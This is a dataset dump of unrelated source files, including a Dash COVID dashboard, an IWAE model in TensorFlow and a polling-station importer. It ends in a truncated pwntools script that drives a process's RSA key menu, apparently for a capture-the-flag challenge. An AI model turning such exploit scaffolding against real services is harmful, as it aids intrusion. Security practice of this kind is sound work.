html.Div([
html.H4('Total Deaths'),
html.H3('{:,}'.format(usa_total_deaths)),
],className='four columns'),
# Choropleth map
html.Div([
dcc.Graph(figure=fig),
],className='twelve columns'),
# USA Case Change
html.Div([
html.H4('Case Change %'),
html.H3('{:,}%'.format(usa_case_percent)),
html.P('over last 5 Days'),
],className='four columns'),
# USA Death Change
html.Div([
html.H4('Death Change %'),
html.H3('{:,}%'.format(usa_death_percent)),
html.P('over last 5 Days'),
],className='four columns'),
]),
html.Br(),
# Graphs
html.Div([
dcc.Graph(
figure={
'data': [
{'x': dff.index, 'y': dff['cases'].values, 'type': 'line', 'name': 'cases'},
{'x': dff.index, 'y': dff['deaths'].values, 'type': 'line', 'name': 'deaths'},
],
'layout': {
'title': 'Cases & Deaths',
#'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
),
],className='five columns'),
html.Div([
dcc.Graph(
figure={
'data': [
{'x': dff_tail.index, 'y': dff_tail['cases'].values, 'type': 'bar', 'name': 'cases'},
],
'layout': {
'title': 'Cases Last 5 Days',
#'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
),
],className='five columns'),
html.Div([
dcc.Graph(
figure={
'data': [
{'x': dff_tail.index, 'y': dff_tail['deaths'].values, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},
],
'layout': {
'title': 'Deaths Last 5 Days',
#'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
),
],className='five columns'),
],className='container')
#########################################################
# End Tab1
elif tab == 'tab-2':
return html.Div([
# Tab 2 Content #
#################
# States
html.H3('Select State'),
html.Div([
dcc.Dropdown(id='my-dropdown2',
options=[{'label': i, 'value': i} for i in sorted(df_states['state'].unique())],
#multi=True,
value='Massachusetts',
searchable=False,
),
], style={'margin': 'auto', 'width': '50%', 'text-align': 'center', 'color': 'black'}),
html.Br(),
# Radio Button Graph
html.Div([
dcc.RadioItems(id='r_button',
options=[
{'label': 'Cases', 'value': 'CASES'},
{'label': 'Deaths', 'value': 'DEATH'},
{'label': 'Both', 'value': 'BOTH'}
],
value='BOTH',
labelStyle={'display': 'inline-block', 'margin-bottom': '10px', 'padding': '5px 5px'}
)
],className='row', style={'text-align': 'left', 'margin-left': '90px'}),
# Main Content Div
html.Div([
# graph div
html.Div([
dcc.Graph(id='graph_1')
],className='six columns'),
# Data div
html.Div([
html.Div(id='total_cases'),
],className='six columns'),
# second graph div
html.Div([
dcc.Graph(id='graph_2')
],className='twelve columns'),
],className='container'),
])# end of Tab 2
##########################################################
# State Graphs Callback and Functions
# Case Graph
@app.callback(Output('graph_1', 'figure'),
[Input('my-dropdown2', 'value'), Input('r_button', 'value')])
def update_figure(value, button):
if button == 'BOTH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},
{'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths'},
],
'layout': {
'title': 'Cases & Deaths',
'height': 310,
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
return(figure)
elif button == 'CASES':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'line', 'name': 'cases'},
],
'layout': {
'title': 'Cases',
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
return(figure)
elif button == 'DEATH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
figure={
'data': [
{'x': df5.index, 'y': df5, 'type': 'line', 'name': 'deaths', 'marker': {'color': 'orange'}},
],
'layout': {
'title': 'Deaths',
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'},
}}
return(figure)
@app.callback(Output('total_cases', 'children'),
[Input('my-dropdown2', 'value')])
def update_contetnt(value):
# New DataFrame
dff = df_states[df_states['state'] == value]
# Case and Death Totals
t_cases = dff['cases'].iloc[-1]
t_deaths = dff['deaths'].iloc[-1]
# Case Calculations
dff2 = dff.set_index('date')
dff2 = dff2['cases'].diff()
dff2 = dff2.dropna()
average_cases = dff2.mean()
average_cases = round(average_cases)
case_percent = (dff['cases'].iloc[-1] - dff['cases'].iloc[-5]) / dff['cases'].iloc[-5] * 100
case_percent = round(case_percent, 2)
month_cases = (dff['cases'].iloc[-1] - dff['cases'].iloc[-30]) / dff['cases'].iloc[-30] * 100
month_cases = round(month_cases, 2)
average_5_cases = dff2.tail()
average_5_cases = round(average_5_cases.mean())
average_30_cases = dff2.tail(30)
average_30_cases = round(average_30_cases.mean())
# Death Calculations
dff3 = dff.set_index('date')
dff3 = dff3['deaths'].diff()
dff3 = dff3.dropna()
average_deaths = dff3.mean()
average_deaths = round(average_deaths)
death_percent = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-5]) / dff['deaths'].iloc[-5] * 100
death_percent = round(death_percent, 2)
month_deaths = (dff['deaths'].iloc[-1] - dff['deaths'].iloc[-30]) / dff['deaths'].iloc[-30] * 100
month_deaths = round(month_deaths, 2)
average_5_deaths = dff3.tail()
average_5_deaths = round(average_5_deaths.mean())
average_30_deaths = dff3.tail(30)
average_30_deaths = round(average_30_deaths.mean())
return(
# HTML TABLE
html.Table([
html.Tr([
# Headers
html.Th(' '),
html.Th('Cases'),
html.Th('Deaths'),
] ),
html.Tr([
#Total
html.Td('Total:'),
html.Td('{:,}'.format(t_cases)),
html.Td('{:,}'.format(t_deaths)),
] ),
html.Tr([
#Average per day
html.Td('Daily Average:'),
html.Td('{:,}'.format(average_cases)),
html.Td('{:,}'.format(average_deaths)),
] ),
html.Tr([
# Average 5 Days
html.Td('Average Last 5 Days:'),
html.Td('{:,}'.format(average_5_cases)),
html.Td('{:,}'.format(average_5_deaths)),
] ),
html.Tr([
# Average 30 Days
html.Td('Average Last 30 Days:'),
html.Td('{:,}'.format(average_30_cases)),
html.Td('{:,}'.format(average_30_deaths)),
] ),
html.Tr([
# Change 5 Days
html.Td('% Change 5 Days:'),
html.Td('{:,}%'.format(case_percent)),
html.Td('{:,}%'.format(death_percent)),
] ),
html.Tr([
#Change 30 Days
html.Td('% Change 30 Days:'),
html.Td('{:,}%'.format(month_cases)),
html.Td('{:,}%'.format(month_deaths)),
] ),
] ),
)
# Graph 2
@app.callback(Output('graph_2', 'figure'),
[Input('my-dropdown2', 'value'), Input('r_button', 'value')])
def update_figure(value, button):
if button == 'BOTH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
df4 = df4.tail()
df5 = df5.tail()
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},
{'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths'},
],
'layout': {
'title': 'Last 5 Days',
'height': '300',
'xaxis': {'tickformat': '%b %d, %Y'},
'xaxis': {'maxnumberoflabels': '5'},
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'}
}}
return(figure)
elif button == 'CASES':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
df4 = df4.tail()
figure={
'data': [
{'x': df4.index, 'y': df4, 'type': 'bar', 'name': 'cases'},
{'x': df4.index, 'y': df4, 'type': 'line', 'marker': {'color': 'black'}},
],
'layout': {
'title': 'Cases Last 5 Days',
'xaxis': {'tickformat': '%b %d, %Y'},
'xaxis': {'maxnumberoflabels': '5'},
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'}
}}
return(figure)
elif button == 'DEATH':
df3 = df_states[df_states['state'] == value]
df3 = df3.set_index('date')
df4 = df3['cases'].diff()
df5 = df3['deaths'].diff()
df4 = df4.mask(df4 < 0)
df5 = df5.mask(df5 < 0)
df5 = df5.tail()
figure={
'data': [
{'x': df5.index, 'y': df5, 'type': 'bar', 'name': 'deaths', 'marker': {'color': 'orange'}},
{'x': df5.index, 'y': df5, 'type': 'line', 'marker': {'color': 'black'}},
],
'layout': {
'title': 'Deaths Last 5 Days',
'xaxis': {'tickformat': '%b %d, %Y'},
'xaxis': {'maxnumberoflabels': '5'},
'paper_bgcolor': '#082255',
'plot_bgcolor': '#082255',
'font': {'color': 'white'}
}}
return(figure)
########################################################
app.config.suppress_callback_exceptions=True
server = app.server
if __name__ == '__main__':
app.run_server(debug=True)
|
StarcoderdataPython
|
11305933
|
<reponame>miguelbravo7/frontur_excel_addin
from setuptools import setup, find_namespace_packages
with open("README.md", 'r') as f:
long_description = f.read()
with open("requirements.txt", 'r') as f:
requirements = f.read().splitlines()
setup(
name="fronTur_excel_addin",
author="<NAME>",
author_email="<EMAIL>",
description="Trabajo de fin de grado",
long_description=long_description,
long_description_content_type="text/markdown",
version="0.2.0",
packages=find_namespace_packages(),
include_package_data=True,
install_requires=['docutils'] + requirements,
keywords="TFG ULL ISTAC",
url="http://example.com/HelloWorld/",
project_urls={
"Documentation": "https://github.com/miguelbravo7/frontur_excel_addin#frontur_excel_addin",
"Source Code": "https://github.com/miguelbravo7/frontur_excel_addin",
},
classifiers=[
"License :: OSI Approved :: BSD License",
'Operating System :: Microsoft :: Windows',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries',
'Topic :: Scientific/Engineering :: Information Analysis',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8'
],
python_requires='>=3.7'
)
|
StarcoderdataPython
|
8128071
|
<reponame>mtravis/UK-Polling-Stations
from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E07000135"
addresses_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019OW.CSV"
stations_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019OW.CSV"
elections = ["local.2019-05-02"]
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if uprn in [
"100030582044", # LE22DB -> LE25DB : 36-38 Bankart Avenue, Oadby, Leicester
"200001140229", # LE25AW -> LE24LZ : Flat 1 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140230", # LE25AW -> LE24LZ : Flat 2 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140231", # LE25AW -> LE24LZ : Flat 3 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140232", # LE25AW -> LE24LZ : Flat 4 St Pauls Court, Chapel Street, Oadby, Leicester
"200001140233", # LE25AW -> LE24LZ : Flat 5 St Pauls Court, Chapel Street, Oadby, Leicester
"10010147237", # LE25QP -> LE182LE : 9 Honeywell Close, Oadby, Leicester
"10010147209", # LE183QH -> LE181DZ : 12A Waterloo Crescent, Wigston, Leicestershire
]:
rec["accept_suggestion"] = False
return rec
|
StarcoderdataPython
|
4956223
|
from lbclassifier import LexiconBasedClassifier
# Lexicon
lexicon = {
"positive": [
{ "term": "excellent", "weight": 1.0 },
{ "term": "good", "weight": 0.7 }
],
"negative": [
{ "term": "horrible", "weight": 1.0 },
{ "term": "bad", "weight": 0.8 }
],
}
# Documents to classify
raw_documents = [
'This book is excellent',
'This book is horrible',
]
# Ordered labels (only necessary if the order is different from the lexicon)
labels = [ "positive", "negative" ]
# Create the classifier
classifier = LexiconBasedClassifier(lexicon, labels=labels)
# Predict the labels index of a dataset
predict = classifier.predict(raw_documents)
print(predict)
# Predict the labels of a dataset
predict_labels = classifier.predict_labels(raw_documents)
print(predict_labels)
# Predict with probabilities for a dataset
predict_proba = classifier.predict_proba(raw_documents)
print(predict_proba)
# Predict with labels and probabilities for a dataset
predict_proba_labels = classifier.predict_proba_labels(raw_documents)
print(predict_proba_labels)
# Predict the label index of a single instance
predict_single = classifier.predict_single(raw_documents[0])
print(predict_single)
# Predict the label of a single instance
predict_single_label = classifier.predict_single_label(raw_documents[0])
print(predict_single_label)
# Predict with probabilities for a single instance
predict_proba_single = classifier.predict_proba_single(raw_documents[0])
print(predict_proba_single)
# Predict with labels and probabilities for a single instance
predict_proba_single_label = classifier.predict_proba_single_label(raw_documents[0])
print(predict_proba_single_label)
|
StarcoderdataPython
|
3314349
|
<filename>ALDS/ALDS1_9_C_using_heapq.py<gh_stars>1-10
import sys
import io
sys.stdin = open("ALDS1_9_C_in4.txt", 'r')
#tmp = input()
# copy the below part and paste to the submission form.
# ---------function------------
import sys
import heapq
nodes = []
outputs = [None] * 2000000
_num_outputs = 0
calc_time = True
if calc_time:import time
def main():
global _num_outputs
if calc_time: start = time.time()
commands = sys.stdin.readlines()
for command in commands:
if command[0] == 'i':
#heapq.heappush(nodes, Node(int(command[7:])))
heapq.heappush(nodes, -(int(command[7:])))
elif command[1] == 'x':
outputs[_num_outputs] = -heapq.heappop(nodes)
_num_outputs += 1
elif command[1] == 'n':
break
if calc_time: print(time.time() - start)
for i in range(_num_outputs):
#print(outputs[i])
pass
return
main()
# -----------------------------
sys.stdin = sys.__stdin__
|
StarcoderdataPython
|
9742087
|
<gh_stars>0
from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import tensorflow_probability as tfp
import datetime
import os, sys
from argparse import ArgumentParser
# Debug module
# from tensorflow.python import debug as tf_debug
import numpy as np
import warnings
from keras.datasets import mnist
from tensorflow.python.summary.writer.writer import FileWriter
import matplotlib.pyplot as plt
warnings.simplefilter('error', UserWarning)
class IWAE:
def __init__(self, input_shape, batch_size, layer_specs, k_samples, lr, sess, small):
self.data_ph = tf.placeholder(dtype=tf.float32, shape=(None, k_samples, input_shape))
self.train_ph = tf.placeholder(dtype=tf.bool)
self.tot_obj_loss = tf.placeholder(dtype=tf.float32)
self.log2pi = tf.log(2 * np.pi)
self.q_probs = []
self.h_units = layer_specs
self.batch_size = batch_size
self.small = small
self.init = tf.placeholder(dtype=tf.bool)
self.k = k
self.log_w = tf.zeros(dtype=tf.float32, shape=[batch_size, self.k])
self.norm_w = tf.zeros_like(self.log_w)
self.sess = sess
self.recon = self.model(self.data_ph)
self.loss, self.obj_loss = self.objective_function()
with tf.name_scope('Optimizer'):
self.optimizer = tf.train.AdamOptimizer(learning_rate=lr, beta1=0.9, beta2=0.999).minimize(self.obj_loss)
self.summary = tf.Summary()
loss_summary = tf.summary.scalar('Objective loss', self.tot_obj_loss)
self.merge_op = tf.summary.merge_all()
print('Logging to:', './logs/' + str(datetime.datetime.now()))
self.writer = tf.summary.FileWriter('./logs/' + str(datetime.datetime.now()))
def dense(self, x_, num_units, init_scale=0.01, scope_name=''):
"""
Dense layer including Weight normalization and initialization
as presented by (Kingma & Salimans, Weight normalization, 2016)
based on code from: https://github.com/openai/weightnorm/blob/master/tensorflow/nn.py
currently not giving any good desirable results
:param x: input data
:param num_units: number of units in the dense layer
:param init_scale: initialization scale
:param scope_name: name of current scope
:return: data run through dense layer
"""
with tf.variable_scope(scope_name):
ema = tf.train.ExponentialMovingAverage(decay=0.998)
if self.init is not False:
V = tf.get_variable('V', shape=[int(x_.get_shape()[-1]), num_units], dtype=tf.float32,
initializer=tf.random_normal_initializer(0, 0.05), trainable=True)
g = tf.get_variable('g', shape=[num_units], dtype=tf.float32,
initializer=tf.constant_initializer(1.), trainable=True)
b = tf.get_variable('b', shape=[num_units], dtype=tf.float32,
initializer=tf.constant_initializer(0.), trainable=True)
else:
V = tf.get_variable('V')
g = tf.get_variable('g')
b = tf.get_variable('b')
tf.assert_variables_initialized([V, g, b])
ema.apply([V, g, b])
g_ = tf.expand_dims(g, 0)
g_ = tf.tile(g_, [self.k, 1])
# use weight normalization (Salimans & Kingma, 2016)
x = tf.matmul(x_, V)
scaler = g_ / tf.sqrt(tf.reduce_sum(tf.square(V), [0]))
b_ = tf.expand_dims(b, 0)
b_ = tf.tile(b_, [self.k, 1])
x = tf.reshape(scaler, [1, self.k, num_units]) * x + tf.reshape(b_, [1, self.k, num_units])
if self.init is not False: # normalize x
m_init, v_init = tf.nn.moments(x, [0])
m_init = m_init[0]
scale_init = init_scale / tf.sqrt(v_init + 1e-10)
scale_init = scale_init[0]
with tf.control_dependencies([g.assign(g * scale_init), b.assign_add(-m_init * scale_init)]):
# x = tf.identity(x)
g_s = tf.expand_dims(g, 0)
g_s = tf.tile(g_s, [self.k, 1])
x = tf.matmul(x_, V)
scaler = g_s / tf.sqrt(tf.reduce_sum(tf.square(V), [0]))
b_ = tf.expand_dims(b, 0)
b_ = tf.tile(b_, [self.k, 1])
x = tf.reshape(scaler, [1, self.k, num_units]) * x + tf.reshape(b_, [1, self.k, num_units])
return x
def MLP_layer(self, x, mlp_units, out_dims, scope_name=''):
"""
MLP layer with sampling built in
:param x: input data
:param mlp_units: dimensions of the MLP layers
:param out_dims: output dimension for matching the next MLP layer
:param scope_name: set the scope_name for WeightNorm, currently not working properly
:return: nu, rho
"""
# 2 regular linear dense layers with leaky Relu activations
# x = self.dense(x, num_units=mlp_units, init_scale=1., scope_name=scope_name + '_dense1')
x = tf.layers.dense(x, mlp_units)
h_inter = tf.nn.leaky_relu(x, alpha=0.1)
# h_i = self.dense(h_inter, num_units=mlp_units, init_scale=1., scope_name=scope_name + '_dense2')
h_i = tf.layers.dense(h_inter, mlp_units)
h_i = tf.nn.leaky_relu(h_i, alpha=0.1)
# nu = self.dense(h_i, num_units=out_dims, init_scale=1., scope_name=scope_name + '_dense3')
nu = tf.layers.dense(h_i, out_dims)
# rho = 0.01 + tf.nn.softplus(self.dense(h_i, num_units=out_dims, init_scale=1., scope_name=scope_name + '_dense4'))
rho = 0.01 + tf.nn.softplus(tf.layers.dense(h_i, out_dims))
return nu, rho
def sample_z(self, nu, rho, value=None, bern=False):
"""
sample from N(nu, rho)
:param nu: mean
:param rho: stddev
:param value: None or the latent variables from the corresponding encoder layer (if we are in the decoder layer)
:param bern: Flag for using a bernoulli distribution
:return: logprob(z|nu,rho) & z
"""
# flag for using a bernoulli distribution
if bern:
sample_dist = tf.distributions.Bernoulli(logits=nu, dtype=tf.float32)
nu_bern = sample_dist.mean()
return nu_bern, self.bincrossentropy(value, nu)
# reparametrization trick
eps = tf.random_normal(tf.shape(nu), dtype=tf.float32)
z_next = nu + rho*eps
if value is not None:
estimate = value
else:
estimate = z_next
log2pi = 0.5*np.log(2*np.pi)
logprob_z = (-tf.constant(log2pi, dtype=tf.float32))-\
0.5*(tf.reduce_sum(tf.square((estimate-nu)/rho) + 2*tf.log(rho), axis=-1))
return z_next, logprob_z
def bincrossentropy(self, x, x_hat):
"""
calculate binary cross-entropy between true image and reconstruction
:param x: true image
:param x_hat: reconstructed image at the bernoulli layer of the decoder
:return: binary cross-entropy
"""
x_hat = tf.nn.sigmoid(x_hat)
bce = x * tf.log(x_hat + 1e-8) + (1 - x) * tf.log(1 - x_hat + 1e-8)
return tf.reduce_sum(bce, axis=-1)
def calc_logw(self, q_logprob, p_logprob):
"""
calculate the log weights
:param q_logprob: output of a layer in q
:param p_logprob: output of a layer in p
:return: no return
"""
self.log_w += p_logprob - q_logprob
def calc_norm_tilde(self):
"""
calculates the normalized importance weights
:return: no return
"""
log_w_max = tf.math.reduce_max(self.log_w, axis=-1, keepdims=True)
log_w = tf.math.subtract(self.log_w, log_w_max)
w = tf.math.exp(log_w)
self.norm_w = tf.math.divide(w, tf.math.reduce_sum(w, axis=-1, keepdims=True))
def objective_function(self):
"""
Calculate the objective function loss
:return: deprecated loss and objective function loss
"""
k = tf.constant(self.k, dtype=tf.float32)
with tf.name_scope('Loss'):
# this loss is currently not used anywhere, deprecated
self.calc_norm_tilde()
loss = - tf.reduce_mean(tf.reduce_sum(self.norm_w * self.log_w, axis=-1))
# objective loss over k-samples
log_sum_w = tf.reduce_logsumexp(self.log_w, axis=-1)
obj_loss = - tf.reduce_sum(tf.math.subtract(log_sum_w, tf.math.log(k)), axis=0)
return loss, obj_loss
def train(self, trn_data):
trn_data = np.array([self.k * [x] for x in trn_data])
_, recon, obj_loss, loss, log_w = self.sess.run([self.optimizer,
self.recon,
self.obj_loss,
self.loss,
self.log_w],
feed_dict={
self.train_ph: True,
self.data_ph: trn_data,
self.init: False
})
return recon, obj_loss, loss, log_w
def test(self, test_data):
test_data = np.array([self.k * [x] for x in test_data])
recon, obj_loss, loss, log_w = self.sess.run([self.recon,
self.obj_loss,
self.loss,
self.log_w],
feed_dict={
self.data_ph: test_data,
self.train_ph: False,
self.init: False
})
return recon, obj_loss, loss
def data_based_initialize(self, mb_data):
test_data = np.array([self.k * [x] for x in mb_data])
empt = self.sess.run([], feed_dict={self.data_ph: test_data, self.init: True})
def model(self, q_z_next):
"""
IWAE model structure for the Non-facturized case
:param q_z_next: input data
:return: returns a reconstructed image
"""
self.log_w = tf.zeros_like(self.log_w)
q_logprob_tot = 0
p_logprob_tot = 0
q_nu_next = None
q_rho_next = None
recon = None
q_zs = [q_z_next]
if self.small is True:
mult = 2
else:
mult = 8
# Encoder portion
for mlp_units in self.h_units:
with tf.name_scope('Q_MLP_layer'):
q_dense_name = 'Q_MLP_layer_{}_'.format(mlp_units)
q_nu_next, q_rho_next = self.MLP_layer(q_z_next, mlp_units=mult * mlp_units,
out_dims=mlp_units, scope_name=q_dense_name)
with tf.name_scope('Q_stochastic_layer'):
q_z_next, q_logprob = self.sample_z(q_nu_next, q_rho_next)
q_logprob_tot += q_logprob
q_zs.append(q_z_next)
# account for prior ~ N(0,1)
with tf.name_scope('Prior'):
prior_nu = tf.zeros_like(q_nu_next)
prior_rho = tf.ones_like(q_rho_next)
_, prior_logprob = self.sample_z(prior_nu, prior_rho, q_z_next)
p_logprob_tot += prior_logprob
# Decoder portion
for p_out, mlp_units, q_z_in, q_z_out in zip([8, 16, 32, 64, 784],
self.h_units[::-1],
q_zs[:0:-1],
q_zs[-2::-1]):
# at last decoder layer, sample from Bernoulli dist
if p_out == 784:
bern = True
else:
bern = False
with tf.name_scope('P_MLP_layer'):
p_dense_name = 'P_MLP_layer_{}_'.format(mlp_units)
p_nu, p_rho = self.MLP_layer(
q_z_in, mlp_units=2 * mlp_units, out_dims=p_out, scope_name=p_dense_name)
with tf.name_scope('P_stochastic_layer'):
p_z_next, p_logprob = self.sample_z(p_nu, p_rho, q_z_out, bern=bern)
if bern:
recon = p_z_next
p_logprob_tot += p_logprob
with tf.name_scope('log_w'):
self.calc_logw(q_logprob_tot, p_logprob_tot)
return recon
def mb(x, batch_size):
"""
Minibatch generator
:param x: input data
:param batch_size: desired batch size
:return: yield a new batch each call
"""
n_samples = x.shape[0]
n_batches = int(np.ceil(n_samples / batch_size))
while True:
permutation = np.random.permutation(x.shape[0])
for b in range(n_batches):
batch_idx = permutation[b *
batch_size:(b + 1) * batch_size]
batch = x[batch_idx]
if batch.shape[0] is not batch_size:
continue
yield batch
parser = ArgumentParser("Tensorflow implementation of IWAE in TMC-paper from NeurIPS 2019")
parser.add_argument('-k', dest='k', type=int, default=20, help="Option for choosing k")
parser.add_argument('--epochs', dest='epochs', type=int, default=1200, help="Option for choosing number of epochs")
parser.add_argument('--batch_size', dest='batch_size', type=int, default=128, help="Option for choosing batch size")
parser.add_argument('--model_type', dest='model_type', type=str, default='small', help="Option for using small or large model")
args = parser.parse_args()
print("Batch size: ", args.batch_size)
print("Number of epochs: ", args.epochs)
print("Model type: ", args.model_type)
print("k: ", args.k)
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.0
x_test = x_test.astype('float32') / 255.0
batch_size = 128
# TODO TEST WITH k = 5, k = 20, k = 50, k = 100
model_type = args.model_type
if model_type == 'small':
small = True
else:
small = False
restore_and_recon = True
lr = float(1e-3)
batch_size = args.batch_size
# want to test with k = 5, 20, 50, 100
"""TODO: TEST WITH k = 5, k = 20, k = 50, k = 100"""
k = args.k
epochs = args.epochs
save_path = 'IWAE_model_non_fac_{}_k_{}'.format(model_type, k)
if not os.path.exists(save_path):
os.mkdir(save_path)
with tf.Session() as sess:
IWAE_net = IWAE(batch_size=batch_size, input_shape=784, k_samples=k, layer_specs=[64, 32, 16, 8, 4],
lr=lr, sess=sess, small=small)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
if restore_and_recon:
saver.restore(sess, '{}'.format(tf.train.latest_checkpoint('/home/linus/DD2412-Reproducibility-project-Group-61/IWAE/IWAE_model_non_fac_small_k_20_iwae_obj/')))
x_gen_test = mb(x_test, 128)
for k in range(70):
test_batch = next(x_gen_test).reshape(batch_size, 784)
recon, obj_loss, loss = IWAE_net.test(test_data=test_batch)
fig, axes = plt.subplots(10, 10)
fig.subplots_adjust(hspace=0)
fig.subplots_adjust(wspace=0)
for j in range(10):
for i in range(10):
axes[j][0].imshow(test_batch[j].reshape(28, 28))
axes[j][0].axis('off')
axes[j][i].imshow(recon[j][i].reshape(28, 28))
axes[j][i].axis('off')
plt.axis('off')
axes[0][0].set_title('Original')
for c in range(1, i+1):
axes[0][c].set_title('Recon')
plt.tight_layout()
plt.show()
else:
x_gen = mb(x_train, batch_size)
x_gen_test = mb(x_test, batch_size)
# x_gen_init = mb(x_train, batch_size)
test_err = []
try:
for epoch in range(1, epochs+1):
# used for the WeightNorm initialization, our implementation is flawed and not used
# if epoch == 1:
# init_batch = next(x_gen_init).reshape(batch_size, 784)
# IWAE_net.data_based_initialize(init_batch)
# iterate enough times to see all of the training data each epoch 1 -> (len(train_data)/batch_size)
for mb_epoch in range(1, 470):
x_batch = next(x_gen).reshape(batch_size, 784)
recon, obj_loss, loss, log_w = IWAE_net.train(x_batch)
test_batch_counter = 0
batch_test_err = 0
# iterate enough times to see all of the test data each epoch 1 -> (len(test_data)/batch_size)
for test_epoch in range(1, 80):
x_batch_test = next(x_gen_test).reshape(batch_size, 784)
test_batch_counter += x_batch_test.shape[0]
recon, obj_loss, loss = IWAE_net.test(x_batch_test)
batch_test_err += obj_loss
testing_err = batch_test_err/int(test_batch_counter) # normalize total error over the nr of batch samples
summary = IWAE_net.sess.run(IWAE_net.merge_op, feed_dict={IWAE_net.tot_obj_loss: testing_err})
IWAE_net.writer.add_summary(summary, global_step=epoch)
# ugly hack for resetting the loss between epochs, only needed for tensorboard
summary = IWAE_net.sess.run(IWAE_net.merge_op, feed_dict={IWAE_net.tot_obj_loss: 0})
test_err.append(testing_err)
print('=====> Objective loss at epoch {}: {}'.format(str(epoch), str(testing_err)))
if epoch == epochs:
# save model at end of runs
print('got to end for model IWAE non-factorized {} with k: {}'.format(model_type, k))
total_obj_loss_model = np.array(test_err)
np.save(save_path+"/tot_obj_loss_k_{}_non_fac_{}".format(k, model_type), total_obj_loss_model)
saver.save(sess,
save_path+"/model_IWAE_forward_non_fac_{}_with_k{}.ckpt".format(model_type, k))
print(test_err)
except KeyboardInterrupt:
# possibility to save model before all epochs have run
print('Stopped training and testing at epoch {} for model IWAE non-factorized {} with k: {}'.format(epoch,
model_type,
k))
total_obj_loss_model = np.array(test_err)
np.save(save_path + "/tot_obj_loss_k_{}_non_fac_{}".format(k, model_type), total_obj_loss_model)
saver.save(sess,
save_path + "/model_IWAE_forward_non_fac_{}_with_k{}.ckpt".format(model_type, k))
|
StarcoderdataPython
|
3500333
|
import numpy as np
def get_B_df_distorted(df, v="0", **kwargs):
if v == "0":
return dist0(df, **kwargs)
def dist0(df, **kwargs):
df_ = df.copy()
if 'Bzf' in kwargs.keys():
Bzf = kwargs['Bzf']
else:
Bzf = 0.
if 'Bz0' in kwargs.keys():
Bz0 = kwargs['Bz0']
else:
Bz0 = 100. # Gauss
if 'z0' in kwargs.keys():
z0 = kwargs['z0']
else:
z0 = 3.239 # m
if 'zf' in kwargs.keys():
zf = kwargs['zf']
else:
zf = 14.139 # m
slope = (Bzf - Bz0) / (zf - z0)
intercept = (Bzf - slope * zf)
Bx, By, Bz = linear_gradient(df_[['X','Y','Z']].values.T, slope, intercept)
# print(Bx.mean(),By.mean(),Bz.mean())
Br = np.sqrt(Bx**2 + By**2)
Bphi = -Bx*np.sin(df_.Phi.values)+By*np.cos(df_.Phi.values)
df_.eval('Bx = Bx + @Bx', inplace=True)
df_.eval('By = By + @By', inplace=True)
df_.eval('Bz = Bz + @Bz', inplace=True)
df_.eval('Br = Br + @Br', inplace=True)
df_.eval('Bphi = Bphi + @Bphi', inplace=True)
return df_
def linear_gradient(pos, slope, intercept):
x, y, z = pos
r = (x**2 + y**2)**(1/2)
phi = np.arctan2(y,x)
Bz = slope * z + intercept
Br = - (r / 2) * slope # Br = - (r / 2) * (d Bz / d Br)
Bx = Br * np.cos(phi)
By = Br * np.sin(phi)
return np.array([Bx, By, Bz])
|
StarcoderdataPython
|
8010258
|
#!/usr/bin/env python3
from pwn import *
context(arch = 'amd64', os = 'linux')
def xgcd(b, n): # take positive integers a, b as input, and return a triple (g, x, y), such that ax + by = g = gcd(a, b).
x0, x1, y0, y1 = 1, 0, 0, 1
while n != 0:
q, b, n = b // n, n, b % n
x0, x1 = x1, x0 - q * x1
y0, y1 = y1, y0 - q * y1
return b, x0, y0
def SendLine(process, str):
process.sendline(str)
print(str)
def SetKey(process, p : int, q : int, e : int, d : int):
SendLine(process, '1')
print(process.recv().decode(), end='')
SendLine(process, str(p))
